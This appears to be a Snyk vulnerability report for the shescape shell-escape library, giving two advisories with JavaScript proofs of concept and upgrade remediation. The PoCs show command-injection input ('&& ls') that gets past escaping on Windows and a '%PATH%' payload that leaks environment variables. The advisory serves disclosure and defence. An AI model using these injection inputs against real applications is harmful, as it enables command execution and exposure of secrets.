Find, fix and prevent vulnerabilities in your code.
medium severity
- Vulnerable module: shescape
- Introduced through: shescape@1.6.1
Detailed paths
-
Introduced through: @snyk/snyk-cocoapods-plugin@snyk/snyk-cocoapods-plugin#4b6dd6baf3b976f600bb85810bbe3f2dc7b43d82 › shescape@1.6.1Remediation: Upgrade to shescape@1.7.4.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Improper Neutralization due to possible escaping the wrong shell, thus allowing attackers to bypass protections. Note: you are only vulnerable if you are using this package on Windows in a threaded context.
PoC
// vulnerable.js
import { exec } from "node:child_process";
import { Worker, isMainThread } from 'node:worker_threads';
import * as shescape from "shescape";
if (isMainThread) {
// 1. Something like a worker thread must be used. The reason being that they
// unexpectedly change environment variable names on Windows.
new Worker("./vulnerable.js");
} else {
// 2. Example configuration that's problematic. In this setup example the
// expected default system shell is CMD. We configure the use of PowerShell.
// Shescape will fail to look up PowerShell and default to escaping for CMD
// instead, resulting in the vulnerability.
const options = {
shell: "powershell",
interpolation: true,
};
// 3. Using shescape to protect against attacks, this is correct.
const escaped = shescape.escape("&& ls", options);
// 4. Invoking a command with the escaped user input, this is vulnerable in
// this case.
exec(`echo Hello ${escaped}`, options, (error, stdout) => {
if (error) {
console.error(`An error occurred: ${error}`);
} else {
console.log(stdout);
}
});
}
Remediation
Upgrade shescape to version 1.7.4 or higher.
References
medium severity
- Vulnerable module: shescape
- Introduced through: shescape@1.6.1
Detailed paths
-
Introduced through: @snyk/snyk-cocoapods-plugin@snyk/snyk-cocoapods-plugin#4b6dd6baf3b976f600bb85810bbe3f2dc7b43d82 › shescape@1.6.1Remediation: Upgrade to shescape@1.7.1.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Information Exposure such that an attacker may be able to get read-only access to environment variables.
Note:
This impact users of Shescape:
- On Windows using the Windows Command Prompt (i.e.
cmd.exe), and - Using
quote/quoteAllorescape/escapeAllwith theinterpolationoption set totrue.
Workaround
Users who are unable to upgrade to the fixed version can remove all instances of % from user input, either before or after using Shescape.
PoC
import * as cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "cmd.exe",
// Or
shell: undefined, // Only if the default shell is CMD
// And
interpolation: true, // Only applies to `escape` and `escapeAll` usage
}
// 2. Attack (one of many)
const payload = "%PATH%";
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable
Remediation
Upgrade shescape to version 1.7.1 or higher.